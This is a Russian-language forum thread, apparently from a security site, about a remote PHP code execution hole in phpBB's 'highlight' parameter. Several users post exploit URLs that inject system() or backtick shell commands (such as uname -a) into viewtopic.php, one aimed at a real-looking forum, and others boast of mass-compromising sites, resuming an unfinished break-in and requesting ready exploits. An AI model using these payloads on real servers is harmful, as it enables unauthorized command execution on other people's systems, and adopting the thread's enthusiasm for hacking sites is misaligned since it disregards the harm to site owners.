Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: 1 2 3 След.
RSS
Выполнение произвольного PHP сценария в phpBB в коде highlighting
 
Обсуждение статьи Выполнение произвольного PHP сценария в phpBB в коде highlighting
 
нет там такого кода!
 
Есть, плохо смотрел. Только я чет не соображу как работает.
 
Все работает)) Это не менее знаменательная дыра, чем была 5 версий форума назад))) Только используется чуть сложнее)) Но если почитать один оффлайн журнал, который о ней писал еще пару месяцев назад (только не до конца), то  можно легко поиметь не один десяток сайтов))ГГ
 
Точнее онлайн журнал одной секурити-тим))) Извиняюсь)
 
Как можно использовать эту уязвимость? Чего нет эксплоита?
 
2Mag: а что за журнал? Где взять?
 
журнал скорее всего CP, в нем писали о PHPBB, о какой-то баге найденной ими лично.
 
Цитата
Taras пишет:
нет там такого кода!

 http://www.target.ru/viewtopic.php?t=1&highlight=".system(%2 0$_GET[cmd])."&cmd=uname%20-a
 
2White Jordan: Не работает.
 
http://VICTIM.RU/forum/viewtopic.php?p=659&highlight=%27.$po ster=%60КОМАНДА%60.%27
//
вот это полностью работает)) при условии, которое написано в журнале)) скачать можно на rst.void.ru его)) статья: phpbb старые баги в новой упаковке))))
//
пхпбб респект!))) можно весь инет поиметь снова)) как полгода назад было)))
 
ooo.... вот ето уже дело =)
был один не завершонный взлом =) пришло время =)
 
Могу написать сплойт, но вот стоит ли)) опять появится толпа скрипткиддисов, крушащих все и вся :( И phpBB Group  тоже странные люди..не написали, что это критическое обновление :) Гг))
 
что-то нифига не пашет
http://forum.novline.ru/viewtopic.php?t=4136&highlight=%27.$ poster=gpi.%27

так?
 
там вообще форума нет))
 
испорченный телефон [IMG]http://www.securitylab.ru/forum/smileys/smiley4.gif[/IMG]
 
Мдя...
Видать, кодеры phpBB очень любят пиво :)
Уже 5-ый месяц в форуме находят баги, и все под статусом critical...
Обидно, однако...
 
Только что-то он ругается... наверное, исходники править надо...
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
 
Так, и не получилось у меня заставить работать этот баг, может кто поделится сплоитом, ходябы чтобы ls-al выполнился, у меня даже до этого не дошло.
 
там выполняются "одиночные" команды.. как только появляется пробел(%20), то не работает.
Страницы: 1 2 3 След.
Читают тему